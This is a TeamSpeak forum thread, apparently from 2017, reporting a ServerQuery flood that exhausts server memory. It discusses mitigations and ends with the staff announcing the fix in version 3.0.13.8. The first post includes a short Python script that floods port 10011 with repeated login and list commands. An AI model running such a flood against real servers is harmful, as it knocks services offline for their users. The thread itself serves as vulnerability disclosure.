Forum


Notice to all users

We are migrating towards a new forum system located at community.teamspeak.com, as such this forum will become read-only on January 29, 2020

Results 1 to 7 of 7
  1. #1
    Join Date
    June 2016
    Location
    Serbia
    Posts
    108

    Server crash till 3.0.13.6

    Could you please patch the Query Admin Exploit
    If someone do this : s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('ip', 10011))
    for i in range(100):
    s.send('login serveradmin')
    s.sendto('login serveradmin',('ip', 10011))
    s.send('clientlist')
    s.sendto('clientlist',('ip', 10011))
    s.send('channellist')
    s.sendto('channellist',('ip', 10011))
    for i in range(100):
    s.send('serverinfo')
    s.sendto('serverinfo',('ip', 10011))
    s.send('clientlist')
    s.sendto('clientlist',('ip', 10011))
    for i in range(100):
    s.send('serverinfo')
    s.sendto('serverinfo',('ip', 10011))
    s.send('channellist')
    s.sendto('channellist',('ip', 10011))


    The Server will CRASH!

    link: https://www.youtube.com/watch?v=vJz2UDqKh0A

  2. #2
    Join Date
    June 2011
    Location
    Germany
    Posts
    4,368
    Couldn't reproduce with default anti-flood settings.

  3. #3
    Join Date
    June 2016
    Location
    Serbia
    Posts
    108
    Quote Originally Posted by numma_cway View Post
    Couldn't reproduce with default anti-flood settings.
    Tell me your settings

  4. #4
    Join Date
    September 2012
    Posts
    6,079
    We couldn't reproduce any crash, the system / server will just consume more CPU cycles dealing with the packages.

    You can use a firewall to block it, reduce the query flood settings or disable query from remote completely.
    When sending PMs please make sure to include a reference link to the thread in question in the body of your message.

  5. #5
    Join Date
    June 2015
    Posts
    41
    This isn't even an exploit.

    Its doing nothing just increasing CPU usage.

    Ping doesn't increase and everything works absolutely fine. Tested with 15 clients.

    Tested with python 3.6.

  6. #6
    Join Date
    October 2016
    Location
    Berlin, Berlin, Germany
    Posts
    160
    This is not a direct exploit.
    If this is done correctly, then the ram from the server is full.
    Then OOM-Kill runs and kills TeamSpeak process.
    See CPU Log: [8205292.655236] Memory cgroup out of memory: Kill process 32156 (ts3server) score 954 or sacrifice child
    [8205292.655322] Killed process 32156 (ts3server) total-vm: 5413380kB, anon-rss: 3637460kB, file-rss: 0kB.
    Why do I know?
    I am affected by this myself ...
    I have lost some users through this script.

    Best regards,
    Michael S.
    PhynixGaming - Team
    My personaly Contact: [email protected]
    Support Request: [email protected]
    Abuse: [email protected]

  7. #7
    Join Date
    June 2008
    Posts
    18,513
    Quote Originally Posted by SossenSystems View Post
    If this is done correctly, then the ram from the server is full.
    Server 3.0.13.8 will fix that problem
    Quote Originally Posted by dante696 View Post
    Server 3.0.13.8 is now available.

    We fixed a possible crash where the server could fill the RAM completely per ServerQuery and removed the ability to connect to the server without a nickname.

    Code:
    === Server Release 3.0.13.8  19 july 2017
     + Server Query connections now have a combined maximum buffer size. When this limit is exceeded,
       the connection using the most memory is closed. The buffer size is controlled by the command
       line variable "query_buffer_mb". The default is 20, which means the maximum amount of buffered
       data is 20 megabyte. The minimum is 1 megabyte. Make sure to only enter positive integer numbers
       here.
     * Connecting to the server query port, now counts as 1 command, with regard to flood protection.
     - Fix client able to connect with no nickname

    Server 3.0.13.8 can be downloaded here.

    You can discuss and provide feedback here.
    When sending me private messages: Please make sure to include reference link to your forum thread or post.

    TeamSpeak FAQ || What should i report, when i open a client thread?

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Similar Threads

  1. [Resolved] How long does it take till Server Query Timeout
    By Melkhior in forum Server Support
    Replies: 1
    Last Post: April 5th, 2017, 10:24 AM
  2. Replies: 1
    Last Post: November 27th, 2014, 09:43 AM
  3. Replies: 2
    Last Post: October 31st, 2013, 10:26 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •